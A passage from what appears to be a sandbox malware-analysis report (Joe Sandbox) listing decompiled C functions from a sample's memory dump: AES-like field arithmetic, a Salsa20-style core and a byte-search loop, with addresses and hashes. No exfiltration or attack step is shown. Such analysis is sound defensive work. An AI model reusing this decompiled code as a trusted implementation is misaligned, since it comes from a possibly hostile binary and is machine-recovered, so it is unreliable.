0x00000007) * 0x0000001b) >> 0x00000007 ^ (((0x0000001b ^ _t409 + _t409) >> 0x00000007) * ((0x0000001b ^ _t409 + _t409) >> 0x00000007) >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (_v11 >> 0x00000007) * 0x0000001b ^ (_t376 >> 0x00000007) * 0x0000001b) * 0x0000001b ^ (_v6 >> 0x00000007) * 0x0000001b ^ (_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 ^ _v14 ^ _v7 ^ _v9 ^ _v10;
					 *(_t600 - 1) = ((0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) + (0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) ^ 0x0000001b ^ (_v8 >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ ((_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5) >> 0x00000007) * 0x0000001b ^ (_v5 >> 0x00000007) * 0x0000001b ^ (((0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) + (0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) ^ 0x0000001b ^ (_v8 >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ ((_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5) >> 0x00000007) * 0x0000001b ^ (_v5 >> 0x00000007) * 0x0000001b) * 0x0000001b ^ 0x0000001b ^ (((0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) + (0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) ^ 0x0000001b ^ (_v8 >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ ((_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5) >> 0x00000007) * 0x0000001b ^ (_v5 >> 0x00000007) * 0x0000001b) * 0x0000001b >> 0x00000020 ^ _v7 ^ _v9 ^ _v12;
					_t342 = _v6 >> 7;
					_t345 = _t342 * 0x1b >> 0x20 >> 7;
					 *_t600 = ((0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ 0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ _v6 ^ _v7 ^ _v9) + (0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ 0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ _v6 ^ _v7 ^ _v9) ^ ((0x0000001b ^ _v8 + _v8) >> 0x00000007) * 0x0000001b ^ (((0x0000001b ^ _v8 + _v8) >> 0x00000007) * ((0x0000001b ^ _v8 + _v8) >> 0x00000007) >> 0x00000020) * 0x0000001b ^ ((((0x0000001b ^ _v8 + _v8) >> 0x00000007) * ((0x0000001b ^ _v8 + _v8) >> 0x00000007) >> 0x00000020) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ ((((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020)) >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ (((0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ 0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ _v6 ^ _v7 ^ _v9) + (0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ 0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ _v6 ^ _v7 ^ _v9) ^ ((0x0000001b ^ _v8 + _v8) >> 0x00000007) * 0x0000001b ^ (((0x0000001b ^ _v8 + _v8) >> 0x00000007) * ((0x0000001b ^ _v8 + _v8) >> 0x00000007) >> 0x00000020) * 0x0000001b ^ ((((0x0000001b ^ _v8 + _v8) >> 0x00000007) * ((0x0000001b ^ _v8 + _v8) >> 0x00000007) >> 0x00000020) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ ((((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020)) >> 0x00000007) * 0x0000001b) >> 0x00000007) * 0x0000001b ^ _t342 * 0x0000001b ^ _v13 ^ 0x0000001b ^ _v7 ^ _v10 ^ _v12;
					_t519 = (0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 >> 0x00000007 ^ (_t345 * 0x0000001b >> 0x00000007) * 0x0000001b ^ _t345 * 0x0000001b + _t345 * 0x0000001b ^ _t345 * 0x0000001b >> 0x00000020 ^ _v5 ^ 0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 >> 0x00000007 ^ (_t345 * 0x0000001b >> 0x00000007) * 0x0000001b ^ _t345 * 0x0000001b + _t345 * 0x0000001b ^ _t345 * 0x0000001b >> 0x00000020 ^ _v5 ^ _v7 ^ _v12) + (0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 >> 0x00000007 ^ (_t345 * 0x0000001b >> 0x00000007) * 0x0000001b ^ _t345 * 0x0000001b + _t345 * 0x0000001b ^ _t345 * 0x0000001b >> 0x00000020 ^ _v5 ^ 0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 >> 0x00000007 ^ (_t345 * 0x0000001b >> 0x00000007) * 0x0000001b ^ _t345 * 0x0000001b + _t345 * 0x0000001b ^ _t345 * 0x0000001b >> 0x00000020 ^ _v5 ^ _v7 ^ _v12) >> 0x00000007 ^ 0x0000001b ^ (((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) * ((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) >> 0x00000020) * 0x0000001b ^ ((((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) * ((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) >> 0x00000020) * (((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) * ((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) >> 0x00000020) >> 0x00000020) * 0x0000001b ^ (((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b ^ _t345 * 0x0000001b + _t345 * 0x0000001b ^ _t345 * 0x0000001b >> 0x00000020) >> 0x00000007) * 0x0000001b ^ (_v5 >> 0x00000007) * 0x0000001b;
					_t371 = _t519 * 0x1b;
					_t600 =  &(_t600[4]);
					 *(_t600 - 3) = _t519 ^ _t371 ^ _v13 ^ _v14 ^ _v9 ^ _v10 ^ _v12;
					_t599 = _t599 - 1;
				} while (_t599 != 0);
				return _t371;
			}

0x0040a719
0x0040a71c
0x0040a721
0x0040a726
0x0040a729
0x0040a733
0x0040a73a
0x0040a73f
0x0040a744
0x0040a752
0x0040a757
0x0040a76b
0x0040a76f
0x0040a77f
0x0040a78c
0x0040a792
0x0040a7b0
0x0040a7b2
0x0040a7b7
0x0040a82a
0x0040a8d1
0x0040a961
0x0040a971
0x0040a97d
0x0040aa00
0x0040aa04
0x0040aa11
0x0040aa1a
0x0040aa1d
0x0040aa1d
0x0040aa2a

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
Instruction ID: e860a63083750337effb18e539a22bba23e2c33b801c9e422b930a4700f084e4
Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
Instruction Fuzzy Hash: 7BA1EA0A8090E4ABEF455A7E80B63FBAFE9CB27354E76719284D85B793C019120FDF50

Uniqueness

Uniqueness Score: -1.00%

Function 0040274E Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86f4a122e0d78ebb15d6c80d3f8db1e35e712697e4858056224195d97d86bbbc
Instruction ID: 01031f9733060372e49dc4c64eab98cf4f28593c37dfea0a5cce7aec6775dd8e
Opcode Fuzzy Hash: 86f4a122e0d78ebb15d6c80d3f8db1e35e712697e4858056224195d97d86bbbc
Instruction Fuzzy Hash: 8CB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680

Uniqueness

Uniqueness Score: -1.00%

Function 0040BDC0 Relevance: .2, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E0040BDC0(intOrPtr __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _t176;
				signed int _t207;
				signed int _t209;
				signed int _t215;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				void* _t235;
				signed int _t238;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t246;
				signed int _t248;
				signed int _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				void* _t259;
				signed int _t261;
				signed int _t262;
				signed int _t270;
				signed int _t271;
				unsigned int _t272;
				signed int _t275;
				signed int _t276;
				intOrPtr _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				void* _t281;
				void* _t284;

				_v56 = 0xa;
				_v60 = __ecx;
				asm("movdqu xmm0, [edi]");
				asm("movdqu [ebp-0x78], xmm0");
				asm("movdqu xmm0, [edi+0x10]");
				asm("movdqu [ebp-0x68], xmm0");
				asm("movdqu xmm0, [edi+0x20]");
				asm("movdqu [ebp-0x58], xmm0");
				asm("movdqu xmm0, [edi+0x30]");
				_t275 = _v80;
				_v8 = _v84;
				_v36 = _v88;
				_v24 = _v92;
				_v48 = _v96;
				_v44 = _v100;
				_v32 = _v104;
				_v20 = _v108;
				_v40 = _v112;
				asm("movdqu [ebp-0x48], xmm0");
				_t238 = _v76;
				_t261 = _v64;
				_t270 = _v68;
				_t278 = _v72;
				_v16 = _v116;
				_v12 = _v120;
				_t176 = _v124;
				_v52 = _t238;
				_v28 = _t176;
				do {
					asm("rol eax, 0x7");
					_v20 = _v20 ^ _t176 + _t238;
					asm("rol eax, 0x9");
					_v24 = _v24 ^ _v20 + _v28;
					asm("rol eax, 0xd");
					_t240 = _v52 ^ _v24 + _v20;
					_v52 = _t240;
					asm("ror eax, 0xe");
					_v28 = _v28 ^ _v24 + _t240;
					asm("rol eax, 0x7");
					_v36 = _v36 ^ _v12 + _v32;
					asm("rol eax, 0x9");
					_t279 = _t278 ^ _v36 + _v32;
					_t241 = _v44;
					asm("rol eax, 0xd");
					_v12 = _v12 ^ _v36 + _t279;
					asm("ror eax, 0xe");
					_v32 = _v32 ^ _v12 + _t279;
					asm("rol eax, 0x7");
					_t271 = _t270 ^ _v8 + _t241;
					asm("rol eax, 0x9");
					_v16 = _v16 ^ _v8 + _t271;
					asm("rol eax, 0xd");
					_t242 = _t241 ^ _v16 + _t271;
					_v44 = _t242;
					asm("ror eax, 0xe");
					_v8 = _v8 ^ _v16 + _t242;
					asm("rol eax, 0x7");
					_t244 = _v40 ^ _t275 + _t261;
					_v40 = _t244;
					asm("rol eax, 0x9");
					_t246 = _v48 ^ _t244 + _t261;
					_v48 = _t246;
					asm("rol eax, 0xd");
					_t276 = _t275 ^ _v40 + _t246;
					asm("ror eax, 0xe");
					_t262 = _t261 ^ _t246 + _t276;
					asm("rol eax, 0x7");
					_v12 = _v12 ^ _v28 + _v40;
					_t207 = _v12;
					_v120 = _t207;
					asm("rol eax, 0x9");
					_v16 = _v16 ^ _t207 + _v28;
					_t209 = _v16;
					_v116 = _t209;
					asm("rol eax, 0xd");
					_t248 = _v40 ^ _t209 + _v12;
					_v40 = _t248;
					asm("ror eax, 0xe");
					_v112 = _t248;
					_t250 = _v28 ^ _v16 + _t248;
					asm("rol eax, 0x7");
					_v44 = _v44 ^ _v32 + _v20;
					_t215 = _v44;
					_v100 = _t215;
					asm("rol eax, 0x9");
					_v28 = _t250;
					_v124 = _t250;
					_t252 = _v48 ^ _t215 + _v32;
					_v48 = _t252;
					asm("rol eax, 0xd");
					_v20 = _v20 ^ _v44 + _t252;
					_t219 = _v20;
					_v108 = _t219;
					asm("ror eax, 0xe");
					_v96 = _t252;
					_t254 = _v32 ^ _t219 + _t252;
					_v32 = _t254;
					_v104 = _t254;
					_t255 = _v36;
					asm("rol eax, 0x7");
					_t275 = _t276 ^ _v8 + _t255;
					asm("rol eax, 0x9");
					_v24 = _v24 ^ _v8 + _t275;
					_t225 = _v24;
					_v92 = _t225;
					asm("rol eax, 0xd");
					_t256 = _t255 ^ _t225 + _t275;
					_t227 = _t256;
					_v36 = _t256;
					_v88 = _t227;
					asm("ror eax, 0xe");
					_v8 = _v8 ^ _t227 + _v24;
					_v84 = _v8;
					asm("rol eax, 0x7");
					_t238 = _v52 ^ _t262 + _t271;
					_v52 = _t238;
					_v76 = _t238;
					asm("rol eax, 0x9");
					_t278 = _t279 ^ _t262 + _t238;
					asm("rol eax, 0xd");
					_t270 = _t271 ^ _t278 + _t238;
					asm("ror eax, 0xe");
					_t261 = _t262 ^ _t270 + _t278;
					_t132 =  &_v56;
					 *_t132 = _v56 - 1;
					_t176 = _v28;
				} while ( *_t132 != 0);
				_v80 = _t275;
				_t235 = _a4 + 2;
				_t277 = _v60;
				_v64 = _t261;
				_v72 = _t278;
				_t280 = 0;
				_v68 = _t270;
				_t259 = _t277 -  &_v124;
				do {
					_t235 = _t235 + 4;
					 *(_t281 + _t280 * 4 - 0x78) =  *(_t281 + _t280 * 4 - 0x78) +  *((intOrPtr*)(_t281 + _t259 + _t280 * 4 - 0x78));
					_t272 =  *(_t281 + _t280 * 4 - 0x78);
					_t280 = _t280 + 1;
					 *((char*)(_t235 - 5)) = _t272 >> 8;
					 *(_t235 - 6) = _t272;
					 *((char*)(_t235 - 4)) = _t272 >> 0x10;
					 *((char*)(_t235 - 3)) = _t272 >> 0x18;
					_t284 = _t280 - 0x10;
				} while (_t284 < 0);
				 *((intOrPtr*)(_t277 + 0x20)) =  *((intOrPtr*)(_t277 + 0x20)) + 1;
				 *((intOrPtr*)(_t277 + 0x24)) =  *((intOrPtr*)(_t277 + 0x24));
				return 0 | _t284 == 0x00000000;
			}

0x0040bdcb
0x0040bdd2
0x0040bdd5
0x0040bdd9
0x0040bdde
0x0040bde3
0x0040bde8
0x0040bded
0x0040bdf5
0x0040bdfa
0x0040bdfd
0x0040be03
0x0040be09
0x0040be0f
0x0040be15
0x0040be1b
0x0040be21
0x0040be27
0x0040be2d
0x0040be32
0x0040be35
0x0040be38
0x0040be3b
0x0040be3e
0x0040be44
0x0040be47
0x0040be4a
0x0040be4d
0x0040be50
0x0040be55
0x0040be58
0x0040be61
0x0040be64
0x0040be6d
0x0040be70
0x0040be77
0x0040be7a
0x0040be7d
0x0040be86
0x0040be89
0x0040be92
0x0040be95
0x0040be97
0x0040be9f
0x0040bea2
0x0040beaa
0x0040bead
0x0040beb5
0x0040beb8
0x0040bebf
0x0040bec2
0x0040beca
0x0040becd
0x0040bed4
0x0040beda
0x0040bedd
0x0040bee3
0x0040bee6
0x0040bee8
0x0040bef1
0x0040bef4
0x0040befb
0x0040befe
0x0040bf01
0x0040bf06
0x0040bf09
0x0040bf11
0x0040bf14
0x0040bf17
0x0040bf1a
0x0040bf20
0x0040bf23
0x0040bf26
0x0040bf29
0x0040bf2f
0x0040bf35
0x0040bf3c
0x0040bf3f
0x0040bf42
0x0040bf48
0x0040bf50
0x0040bf53
0x0040bf56
0x0040bf59
0x0040bf5f
0x0040bf62
0x0040bf65
0x0040bf6b
0x0040bf72
0x0040bf75
0x0040bf78
0x0040bf7b
0x0040bf7e
0x0040bf83
0x0040bf86
0x0040bf8c
0x0040bf91
0x0040bf94
0x0040bf97
0x0040bf9c
0x0040bf9f
0x0040bfa6
0x0040bfa9
0x0040bfac
0x0040bfaf
0x0040bfb4
0x0040bfb7
0x0040bfb9
0x0040bfbb
0x0040bfc1
0x0040bfc7
0x0040bfca
0x0040bfd0
0x0040bfd6
0x0040bfd9
0x0040bfdb
0x0040bfde
0x0040bfe4
0x0040bfe7
0x0040bfec
0x0040bfef
0x0040bff4
0x0040bff7
0x0040bff9
0x0040bff9
0x0040bffc
0x0040bffc
0x0040c008
0x0040c00b
0x0040c00e
0x0040c013
0x0040c019
0x0040c01c
0x0040c01e
0x0040c021
0x0040c023
0x0040c02a
0x0040c02d
0x0040c031
0x0040c03a
0x0040c03b
0x0040c040
0x0040c049
0x0040c04c
0x0040c04f
0x0040c04f
0x0040c054
0x0040c05f
0x0040c068

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
Instruction ID: dd0030fd0a7875149aee9059f6285016d8f613d36493dd9a45a836b4a4b814ec
Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
Instruction Fuzzy Hash: 83B16BB5E002199FCB84DFE9C985ADEFBF0FF48210F64816AD515E7301E334AA558B54

Uniqueness

Uniqueness Score: -1.00%

Function 00420F30 Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00420F30(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
